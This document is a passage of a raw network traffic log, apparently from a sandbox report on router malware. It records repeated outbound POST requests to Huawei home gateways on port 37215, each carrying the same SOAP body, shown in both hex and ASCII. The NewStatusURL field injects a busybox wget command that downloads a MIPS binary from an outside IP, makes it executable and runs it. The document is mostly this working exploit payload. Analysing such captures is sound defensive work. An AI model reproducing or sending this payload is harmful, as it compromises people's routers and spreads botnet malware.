75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        78192.168.2.1445614197.107.159.22637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092880964 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        79192.168.2.1439344197.69.11.10537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092916012 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        80192.168.2.145419441.127.210.2737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092941046 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        81192.168.2.145774641.17.104.9837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.092984915 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        82192.168.2.1441214156.6.58.5537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093007088 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        83192.168.2.144186441.39.14.18137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093020916 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        84192.168.2.1437688156.251.245.14937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093048096 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        85192.168.2.1441142197.95.142.737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093080997 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        86192.168.2.144569441.66.135.6837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093097925 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        87192.168.2.1447610156.13.82.9637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093132973 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        88192.168.2.1437618197.150.96.22337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.093148947 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
